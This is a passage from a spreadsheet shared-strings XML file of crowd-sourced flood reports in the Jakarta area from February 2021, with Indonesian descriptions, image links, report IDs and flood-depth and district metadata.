    <t>Banjir depan Puskesmas Petogogan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bIwLuHpBqSBUKniylkkQ1Gh5yzIS-dgaVBvr5bTNXl9Jr2GnoMeU4rQZDzR1ItHE-6STTv00furH-XN19Wtku5QjGxXgASLbCB_se4OO_w=s480-c</t>
  </si>
  <si>
    <t>#PelayananLurah Tolong bantuannya untuk tetangga yg kebanjiran untuk fibantu pengangkatan limbah pasca banjir... #UrgentKeversihan"</t>
  </si>
  <si>
    <t>2bce26ab-c099-48b0-8423-bd9176ed9351</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2bce26ab-c099-48b0-8423-bd9176ed9351.jpg</t>
  </si>
  <si>
    <t>Banjir sepanjang jalan taruma sayang</t>
  </si>
  <si>
    <t>c4612704-b63f-4258-acab-eeee2b701472</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 74, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1290", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Warga minta pengemudi untuk putar balik karena banjir</t>
  </si>
  <si>
    <t>b4d29515-9f8e-4fea-9ba6-1ab809ceecd4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4d29515-9f8e-4fea-9ba6-1ab809ceecd4.jpg</t>
  </si>
  <si>
    <t>Pinggir jalan tol gaes dan KCIC masih kerja tanam paku bumi</t>
  </si>
  <si>
    <t>b0ac8373-0b20-4215-95b7-bcf5f8631dd9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0ac8373-0b20-4215-95b7-bcf5f8631dd9.jpg</t>
  </si>
  <si>
    <t>Need a help</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8oJ5nv2cLmoAMPmUjuuF301DvVgVr_b7XQ0_mTeDAoGQpeqTv_YcMCgIX6mbyzWisKesfXC3A-vlV5qoovoAlM93XrVjqgmgN27khoWq=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil tpu karet bivak. Tolong di atasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/aK81ZVGp9NJS86ycEwLkbYGA0mmd1Iv3M9jR1UTDg5QbemeimfVCuaxnqgkQUQ4IM8H_0ioyiT48M7D3NTwEJLQ20R1JWsTXz6Hgc65n9g=s480-c</t>
  </si>
  <si>
    <t>banjir di komplek joglo baru</t>
  </si>
  <si>
    <t>109ca937-8ed0-408f-ac86-c1dd253e2e30</t>
  </si>
  <si>
    <t>https://images.petabencana.id/109ca937-8ed0-408f-ac86-c1dd253e2e30.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2639", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Tj. Sanyang, Cawang, Kramat Jati</t>
  </si>
  <si>
    <t>619d4d19-1841-4bca-a1bd-00219fe52fc7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/619d4d19-1841-4bca-a1bd-00219fe52fc7.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 135, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir Udah seleher orang dewasa</t>
  </si>
  <si>
    <t>16171ffd-77f8-42f6-8867-e1e73d4a488c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/16171ffd-77f8-42f6-8867-e1e73d4a488c.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 4, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2302", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Belakang GI Aman</t>
  </si>
  <si>
    <t>Kebon Melati</t>
  </si>
  <si>
    <t>cdafc26d-f439-4b0a-8eea-83a36de8fe97</t>
  </si>
  <si>
    <t>lumayan deras, kendaraan sulit lewat</t>
  </si>
  <si>
    <t>6322f8b8-6128-4bba-a88b-a738f6cf36f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6322f8b8-6128-4bba-a88b-a738f6cf36f2.jpg</t>
  </si>
  <si>
    <t>825e4cc1-3097-4ea0-a659-ea4ced85cf78</t>
  </si>
  <si>
    <t>https://images.petabencana.id/825e4cc1-3097-4ea0-a659-ea4ced85cf78.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 176 }</t>
  </si>
  <si>
    <t>mohon bantuan evakuasi keluarga</t>
  </si>
  <si>
    <t>0113b6d0-d094-401f-919d-904a0c7df2c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0113b6d0-d094-401f-919d-904a0c7df2c7.jpg</t>
  </si>
  <si>
    <t>Rawa Barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/SpdwIJDjay3WvdHnuB7QiUvLY7GIEjfKoci5_jZIwzkLG8aV9q8_0bb8sWYxsiOTCr9iKCMJh5kFTVxuDNGyNGFtGTCiXRN3fJACAjH-=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap di rw 05 sepanjang jalan adhi karya. Tolong di atasi</t>
  </si>
  <si>
    <t>c5f5b02b-88b9-4042-ab4c-897c1d883eff</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5f5b02b-88b9-4042-ab4c-897c1d883eff.jpg</t>
  </si>
  <si>
    <t>{ "points": 20, "report_type": "structure", "structureFailure": 1 }</t>
  </si>
  <si>
    <t>Tanah Longsor ini sudah 3 kali longsor tapi belum di benahi. dan sekarang longsor lagi dengan sebagian rumah runtuh. mohon bantuannya.."</t>
  </si>
  <si>
    <t>762f23c0-b6bd-42ab-949d-e5399d8a2231</t>
  </si>
  <si>
    <t>https://images.petabencana.id/762f23c0-b6bd-42ab-949d-e5399d8a2231.jpg</t>
  </si>
  <si>
    <t>05907a7b-c013-49a2-a2c5-895cebfea148</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05907a7b-c013-49a2-a2c5-895cebfea148.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 117, "report_type": "flood" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Sx_516yxVhZpDfIZRmXskyhnhgDe0AjTI63BfV6ofAhHx6pO5ooc6PPAo8t5Gbtye2ZBsKPoVUo3uVaU4jvensXpiQ_wmJ6nYGWvMV62bQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1887", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil terowongan cawang. Tolong benahi drainase yg buruk</t>
  </si>
  <si>
    <t>e2920a75-07df-4bcb-b800-7b9ac1508dde</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e2920a75-07df-4bcb-b800-7b9ac1508dde.jpg</t>
  </si>
  <si>
    <t>Perum Pinang Griya Permai dekat kali Angke, air kiriman ditambah ada tanggul yang bocor. Air mulai naik sejak jam 6 pagi sampai skrg jam 12</t>
  </si>
  <si>
    <t>d45a2279-3a60-4cef-8352-f2187ad8a545</t>
  </si>
  <si>
    <t>Molek, pondok gede, banjir, dalam rumah setinggi semata kaki. Di jalan sedengkul orang dewasa</t>
  </si>
  <si>
    <t>04cd9f62-6d8c-47d2-89ad-6327cca61c1b</t>
  </si>
  <si>
    <t>Perumahan Pondok kacang prima banjir akibat tanggul jebol</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/OcXCD8_-1nXAd_QRJI02hlJb_AYi5N16D1z4epb7ppapA8_4ZoIFzTDCco88eYoPRUjPmNxc4Pcr4xuWhJ_TEaMIpnBc8_QqGka24jHJSA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1263", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jalan syiaridin rt09 rw09, inter studio (mangga besar) ragunan jakarta selatan tolong ini kenapa airnya ga surut surut ya?? saya baru pertama kali ini selama 20 tahunan terakhir begini sudah sampai hampir seleher orang dewasa airnya tolong segera di a"</t>
  </si>
  <si>
    <t>0d77ab39-bfe0-473c-b68d-f28d1702beea</t>
  </si>
  <si>
    <t>Pondok Gede Permai, Jatiasih. Di dalam rumah sudah sedengkul orang dewasa."</t>
  </si>
  <si>
    <t>1f463d79-3030-4bfe-b77e-38fdc4c0f796</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f463d79-3030-4bfe-b77e-38fdc4c0f796.jpg</t>
  </si>
  <si>
    <t>Banjir paling parah dr sebelumnya, tolong perhatiannya pemerintah daerah atau pusat. Media juga gak pernah ada yg liput.</t>
  </si>
  <si>
    <t>Jayamukti</t>
  </si>
  <si>
    <t>62a072d3-862e-46bf-ab5e-3080b862c59b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/62a072d3-862e-46bf-ab5e-3080b862c59b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1838", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjirnya kurang lebih 3 meter</t>
  </si>
  <si>
    <t>a53d3f1e-9789-4765-9583-ed5a53e04837</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1864", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir lut</t>
  </si>
  <si>
    <t>decf1f19-614c-4fe5-8128-f0edcc45aa58</t>
  </si>
  <si>
    <t>Banjir sejak jumat sore, sekarang (sabtu jam 12.08) ketinggian air makin naik</t>
  </si>
  <si>
    <t>d95a0c6b-fd5b-4ba2-8988-8454386892e5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d95a0c6b-fd5b-4ba2-8988-8454386892e5.jpg</t>
  </si>
  <si>
    <t>Keadaan di rumah saya</t>
  </si>
  <si>
    <t>5bd95040-477a-4782-9005-9c557a43a1c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5bd95040-477a-4782-9005-9c557a43a1c2.jpg</t>
  </si>
  <si>
    <t>RW 07 Komplek Antilope Jatiwaringin Kelurahan Jaticempaka Kecamatam Pd. Gede Banjir ketinggian bervariasi minimal 50cm sampai dengan 150cm</t>
  </si>
  <si>
    <t>7eca9018-957d-4866-ab2c-f67474dbe94b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7eca9018-957d-4866-ab2c-f67474dbe94b.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 138 }</t>
  </si>
  <si>
    <t>Banjir seleher</t>
  </si>
  <si>
    <t>b3d69f22-d609-43d0-b387-77e954334f1e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b3d69f22-d609-43d0-b387-77e954334f1e.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 198, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2487", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir 3 meter di pasar minggu  pejaten timur jakselrt 016 rw 007 TK NURUL ISLAM</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357984</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/20/357984-16137965121650986466.mp4-03.jpg</t>
  </si>
  <si>
    <t>Melihat Kondisi Terkini Banjir di Rawalumbu</t>
  </si>
  <si>
    <t>keadaan saat ini tepatnya di Rawalumbu Bekasi, hujan deras mengakibatkan luapan air dari kali, sehingga jalanan tertutup air dan  Banjir (sabtu, 20/2) sehingga kendaraan dan pejalan kaki tidak bisa melewatinya</t>
  </si>
  <si>
    <t>Bojong Menteng</t>
  </si>
  <si>
    <t>1aa79f22-20b4-47d3-8b51-0cafaa299767</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1aa79f22-20b4-47d3-8b51-0cafaa299767.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 44, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir Di Perumahan Villa Cileungsi Asri 2 Klapanunggal Bogor Jawa Barat</t>
  </si>
  <si>
    <t>Kelapa Nunggal</t>
  </si>
  <si>
    <t>fc3b94d1-1a47-4ae4-963f-2c2e630e4e45</t>
  </si>
  <si>
    <t>Banjir sudah dr jam 3 pagi</t>
  </si>
  <si>
    <t>f5d65a04-5ee2-47d0-a928-4ce1591c1ead</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 118, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Bangka Buntu Dua Ujung, bersebrangan dengan kelurahan petogogan</t>
  </si>
  <si>
    <t>b985fee5-6c14-4f5e-ba2b-8c0843de47b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b985fee5-6c14-4f5e-ba2b-8c0843de47b1.jpg</t>
  </si>
  <si>
    <t>Banyak warga yang terjebak banjir, membutuhkan bantuan makanan, dan dirumah lain mungkin ada yang perlu untuk segera di evakuasi.</t>
  </si>
  <si>
    <t>6937c007-d99b-4020-bb04-a24bc2689b4f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6937c007-d99b-4020-bb04-a24bc2689b4f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 134, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kel Mampang Prapatan 16 Kec Duren Tiga RW.05 Belakang Toko Bangunan Raja</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/D_hpYWkQP1fONuiGyQ1EKIb2b2Hm8muh38cEOK7vRh_m2YIwY6NhInKD8__03r-IOSfpdGUIO9gj0dAQu7dkQhkE3jJFxyBw8VfGUNi1=s480-c</t>
  </si>
  <si>
    <t>banjir sejak pukul 6 pagi, dan semakin tinggi. di komplek dhi, kapuk muara-penjaringan</t>
  </si>
  <si>
    <t>9e31c38c-7523-4b74-abad-409e71d89da1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9e31c38c-7523-4b74-abad-409e71d89da1.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 170, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir ciledug indah setinggi leher orang dewasa.. Mohon bantuan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xEDTdVRQ_LhKSA3MU2uLZPNSqghqcoaOkFv-0Fc8yh6YEK3bqta2arV6uLmPODJH6CyFWJR4C2KT1FRtaFInVBBpfuZA3sVAnm1OB49SO2Q=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap sehingga menyebabkan Banjir di Panas Hari</t>
  </si>
  <si>
    <t>588ca9d2-9d63-4c5e-8ae6-d777689df5a1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/588ca9d2-9d63-4c5e-8ae6-d777689df5a1.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 55, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir tak kunjung surut, sejak jam 1 dini hari naik sekitar 20 cm kemudian jam 5 pagi sudah sekitar 55 cm atau setengah paha orang dewasa</t>
  </si>
  <si>
    <t>ba29b343-bc08-459d-9d54-3346ea462da3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ba29b343-bc08-459d-9d54-3346ea462da3.jpg</t>
  </si>
  <si>
    <t>Banjir dr jam 03.00 dini hari</t>
  </si>
  <si>
    <t>c1ca2078-f95d-45cf-a140-f24a81bc0c6e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c1ca2078-f95d-45cf-a140-f24a81bc0c6e.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 7 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1504", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2e61675b-bbe3-464b-a0a7-de4e4bf69bad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e61675b-bbe3-464b-a0a7-de4e4bf69bad.jpg</t>
  </si>
  <si>
    <t>Banjir Puri Kartika baru Ciledug</t>
  </si>
  <si>
    <t>af56e00c-684f-4b10-b243-b53a6e5e2b71</t>
  </si>
  <si>
    <t>https://images.petabencana.id/af56e00c-684f-4b10-b243-b53a6e5e2b71.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 181 }</t>
  </si>
  <si>
    <t>Sudah naik hampir 2 meter</t>
  </si>
  <si>
    <t>3caa14be-f2ec-4d4c-85c4-e5dcc919ceda</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3caa14be-f2ec-4d4c-85c4-e5dcc919ceda.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2566", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di sekitaran green garden residence jakarta barat</t>
  </si>
  <si>
    <t>c61bd99d-3529-4ab4-a8c2-e1252f26129a</t>
  </si>
  <si>
    <t>Banjir di sebrang pejaten village dari ragunan arah kemang dan buncit tidak bisa dilalui</t>
  </si>
  <si>
    <t>b1886c53-bff3-43d0-b202-1d1f9334f378</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b1886c53-bff3-43d0-b202-1d1f9334f378.jpg</t>
  </si>
  <si>
    <t>Bendungan hilir banjir</t>
  </si>
  <si>
    <t>f6c4f62f-88af-4e8b-a2ad-46381df3fdaf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f6c4f62f-88af-4e8b-a2ad-46381df3fdaf.jpg</t>
  </si>
  <si>
    <t>Banjir di Jl Menara Kel. karang tengah Kec. Karang timur, Tangerang. Sdh hampir 12 jam terjebak</t>
  </si>
  <si>
    <t>6aa03054-4ebb-45b2-a114-7a48aca541e4</t>
  </si>
  <si>
    <t>Jl. Bumi 1 No. 1, Blok C5, Kelurahan Mekarmurti, Kecamatan Cikarang Utara</t>
  </si>
  <si>
    <t>b438f62f-539c-4b33-91d3-69b47a549d0a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b438f62f-539c-4b33-91d3-69b47a549d0a.jpg</t>
  </si>
  <si>
    <t>dekat rptra carina sayang, banjir luapan akses ke perumahan bojong indah</t>
  </si>
  <si>
    <t>d9c5d6b9-ce51-41c8-a48d-e77a294168c1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9c5d6b9-ce51-41c8-a48d-e77a294168c1.jpg</t>
  </si>
  <si>
    <t>Banjir 50cm++. Roda 2&amp;4 hindari jalur ini!!!!!</t>
  </si>
  <si>
    <t>4948a0f1-ce61-4770-b2bd-755800cc70b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4948a0f1-ce61-4770-b2bd-755800cc70b8.jpg</t>
  </si>
  <si>
    <t>Banjir sampai 4 lajur sudirman</t>
  </si>
  <si>
    <t>5541f41c-e9eb-4784-8b8a-85cbb185d99a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5541f41c-e9eb-4784-8b8a-85cbb185d99a.jpg</t>
  </si>
  <si>
    <t>Sepanjang jalan bemdungan hilir banjir selutut orang dewasa dan merembet ke dalam gang perumahan</t>
  </si>
  <si>
    <t>cbd11fe3-946a-436f-9d7d-96cca8567dde</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cbd11fe3-946a-436f-9d7d-96cca8567dde.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 152 }</t>
  </si>
  <si>
    <t>Banjir di perumahan griya setu permai</t>
  </si>
  <si>
    <t>Telajung</t>
  </si>
  <si>
    <t>feb5c184-11d2-4955-9f9f-d504dfd12a63</t>
  </si>
  <si>
    <t>Banjir di tanah rendah kebon pala jakarta timur</t>
  </si>
  <si>
    <t>46de40a2-9308-4d9b-8383-04bc8e21e581</t>
  </si>
  <si>
    <t>Banjir di perum bumi nasio indah</t>
  </si>
  <si>
    <t>c4921a08-3d0d-433b-b89a-f131ed1a8e56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4921a08-3d0d-433b-b89a-f131ed1a8e56.jpg</t>
  </si>
  <si>
    <t>f2f4ba65-e607-4881-8c23-1c4999e40b53</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2f4ba65-e607-4881-8c23-1c4999e40b53.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 45, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir Kantor Kelurahan Rawa Buaya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rhIbgrNJpGSRn_TxsP6-vUrPRYYMIH6kAjwj28_XEudSV_GpMinTVeVFJJ5CrVhzwdxqr3yZ7IfvhpuMswOL_j797VwMSIeUHbyEPaILwQ8=s480-c</t>
  </si>
  <si>
    <t>banjir di jl pancoran Ulujami Pesanggrahan Jakarta Selatan</t>
  </si>
  <si>
    <t>ff96805c-782d-4508-a815-6eafac84dd4b</t>
  </si>
  <si>
    <t>mending muter deh/lewat kalimalang</t>
  </si>
  <si>
    <t>6ebc5ea5-9af7-4b7d-a540-22d3e4b0b1d4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6ebc5ea5-9af7-4b7d-a540-22d3e4b0b1d4.jpg</t>
  </si>
  <si>
    <t>Bendungan hilir gang 12</t>
  </si>
  <si>
    <t>d9d1068f-fa08-443a-94e0-394adcca2120</t>
  </si>
  <si>
    <t>Banjir terjadi sejak jam 7.00 pagi</t>
  </si>
  <si>
    <t>b9098124-4a32-46db-bc74-2f7a03087073</t>
  </si>
  <si>
    <t>banjir wisma tajur disebabkan air kiriman, air masih terus naik, kondisi sekarang tinggi air sepinggang</t>
  </si>
  <si>
    <t>5051b778-7c83-42f2-9f8e-c2dd7767bfc4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5051b778-7c83-42f2-9f8e-c2dd7767bfc4.jpg</t>
  </si>
  <si>
    <t>Jalan Komodor Halim Perdanakusuma Gang Seruni RT 02/01</t>
  </si>
  <si>
    <t>40f95c84-ee46-4b16-92a0-73c846d54dec</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/OrIrxOGw-JYkJ7yfdK_fDyCf_Xry10ROsUrSd-WyFzXePqzKe_YX2d1njs6IvTIPz-V6eEGA8yWxBdmmAtct24uL5bowdCgm7iMfeehCYA=s480-c</t>
  </si>
  <si>
    <t>semalam komplek Mutiara Damai Town House RT 007 RW 003 Batu Ampar kebanjiran. banyak sampah di aliran sungai. mohon penanganan</t>
  </si>
  <si>
    <t>fd29166f-e427-4ae2-b015-96605dc153e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fd29166f-e427-4ae2-b015-96605dc153e4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1833", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir  mulai jam 12.30 pagi hingga saat ini di Perumahan Bumi Harapan Permai RW 006 Kelurahan Dukuh, Kramatjati, Jakarta Timur</t>
  </si>
  <si>
    <t>2b069879-5718-4c6d-8f26-9f0dc4e7134e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2b069879-5718-4c6d-8f26-9f0dc4e7134e.jpg</t>
  </si>
  <si>
    <t>Banjir 20 Feb 2021 RW 03 Kel. Petogogan Mohon Bantuan makanan untuk warga karena tidak mungkin keluar rumah"</t>
  </si>
  <si>
    <t>9bc8db74-1511-4e04-9c1e-6ba87b4fb668</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9bc8db74-1511-4e04-9c1e-6ba87b4fb668.jpg</t>
  </si>
  <si>
    <t>Banjir di seluruh jembatan 3 Perumahan Pondok Timur Indah Mustika Jaya</t>
  </si>
  <si>
    <t>9e8cbe62-2e9b-4369-a630-2fa32d3f9c29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9e8cbe62-2e9b-4369-a630-2fa32d3f9c29.jpg</t>
  </si>
  <si>
    <t>95c54cb4-0585-4782-8ee3-f6b36aabe749</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95c54cb4-0585-4782-8ee3-f6b36aabe749.jpg</t>
  </si>
  <si>
    <t>Daerah alamat: Di Jl. Cendrawasih 3 Jaka Mulya Kec. Bekasi Selatan Kota Bekasi. Kondisi : Tinggi air sepaha orang dewasa pk. 14.22 WIB"</t>
  </si>
  <si>
    <t>Cibodas Baru</t>
  </si>
  <si>
    <t>92c6f3cc-e152-4870-8806-b8157716952a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/92c6f3cc-e152-4870-8806-b8157716952a.jpg</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 56, "report_type": "flood" }</t>
  </si>
  <si>
    <t>16f53d9e-6e86-4e62-9dce-358bc51f4deb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/16f53d9e-6e86-4e62-9dce-358bc51f4deb.jpg</t>
  </si>
  <si>
    <t>Bundaran Little Talk Vida Bekasi</t>
  </si>
  <si>
    <t>2fe75ada-40ab-4e8c-abc4-eb153d86d54f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2fe75ada-40ab-4e8c-abc4-eb153d86d54f.jpg</t>
  </si>
  <si>
    <t>Rosa 2 dan 4 pilih jalan lain saja</t>
  </si>
  <si>
    <t>d2d2ebe3-e1d9-4be0-8452-68b8d8a8e6ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d2d2ebe3-e1d9-4be0-8452-68b8d8a8e6ac.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "152", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>imbas luapan kali pessanggrahan, tinggi air 20-50cm</t>
  </si>
  <si>
    <t>99885130-10c5-416f-a3d6-e97789617e55</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99885130-10c5-416f-a3d6-e97789617e55.jpg</t>
  </si>
  <si>
    <t>Masih banjir 30cm</t>
  </si>
  <si>
    <t>6bfe3a6a-9cf4-4949-a74e-8a89f94305a5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6bfe3a6a-9cf4-4949-a74e-8a89f94305a5.jpg</t>
  </si>
  <si>
    <t>Daerah alamat: Di Jl. Cendrawasih 3 Jaka Mulya Kec. Bekasi Selatan Kota Bekasi. Kondisi : Tinggi air sepaha orang dewasa pk. 11.32 WIB"</t>
  </si>
  <si>
    <t>870857d0-d5ad-4e60-9090-e7f19b9c0fc8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/870857d0-d5ad-4e60-9090-e7f19b9c0fc8.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 142, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di Jl Bangka 11 Ujung, patokan belva townhouse, air sudah seleher orang dewasa</t>
  </si>
  <si>
    <t>8cebb5a8-0a92-4101-ac8d-1e948ade7428</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8cebb5a8-0a92-4101-ac8d-1e948ade7428.jpg</t>
  </si>
  <si>
    <t>Perumahan Beranda Mas - Natura, Vida Bekasi</t>
  </si>
  <si>
    <t>80dad7fe-7872-4dbe-946f-c69858c0a1be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/80dad7fe-7872-4dbe-946f-c69858c0a1be.jpg</t>
  </si>
  <si>
    <t>Terpaksa muter balik,</t>
  </si>
  <si>
    <t>Bantargebang</t>
  </si>
  <si>
    <t>c0a23e4e-e013-42c6-873b-d8776ec74ad0</t>
  </si>
  <si>
    <t>akibat luapan Kali Pessanggrahan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357990</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/20/16138046312098018183.jpg</t>
  </si>
  <si>
    <t>Genangan Air Rendam Tol Taman Mini</t>
  </si>
  <si>
    <t>Tol Taman Mini macet diakibatkan genangan air melimpah ke jalan tol</t>
  </si>
  <si>
    <t>c09de5e6-d6f0-4756-80a9-a78a7d9a3678</t>
  </si>
  <si>
    <t>Perum bulog 3</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/hpi4ttruLzfndsD_itBLPVRUA7T0vr9ScPqmyZXO3wxGlYcrreYLXEMz3B1tRImdbFPinURrmBFTA9DkFEFBV0h10S8T_mKCglh2u4pA=s480-c</t>
  </si>
  <si>
    <t>tolong dibantu dsni banjir sudah setinggi dengkul orang dewasa,dan debit aernya semakin tinggi,blm ada bantuan sama sekali dr pihak2 terkait soal banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/HByojx5Gm1xKhu2eQYGFBlP-lL9QtAlOPOFd-f1A2reC7gJgbWtzNSZHCBvXUI_t_fAsgp8u26YEj4TU86gbJugtJLs2w5B9wXai60sswg=s480-c</t>
  </si>
  <si>
    <t>banyak warga yg terisolir dan butuh bantuan,banyak juga lansia dan anak2. ketinggian Aer SDH mencapai dengkul orang dewasa dan debit Aer semakin menambah. posisinya di perum cahaya Darussalam 2 tambun desa jejalen jaya"</t>
  </si>
  <si>
    <t>395853ee-d9eb-4d9b-bb52-cf4744ee91c0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/395853ee-d9eb-4d9b-bb52-cf4744ee91c0.jpg</t>
  </si>
  <si>
    <t>145f471f-b430-4371-b052-b5cf9e026859</t>
  </si>
  <si>
    <t>https://images.petabencana.id/145f471f-b430-4371-b052-b5cf9e026859.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1147", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-a61NXcmor89s9xF3aH606TdLvyOxJ9Eyo5wKhAZVYyV8k5oAhEPaRm2s7ReoYJj961jKqPMLgF3tjBlPxJbyIMnuUcARbXw14S7sNMNrA=s480-c</t>
  </si>
  <si>
    <t>tolong dibantu secepatnya,soalnya debit Aer semakin tinggi</t>
  </si>
  <si>
    <t>58759565-c545-465c-84a5-376e95e0d0c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/58759565-c545-465c-84a5-376e95e0d0c9.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 164 }</t>
  </si>
  <si>
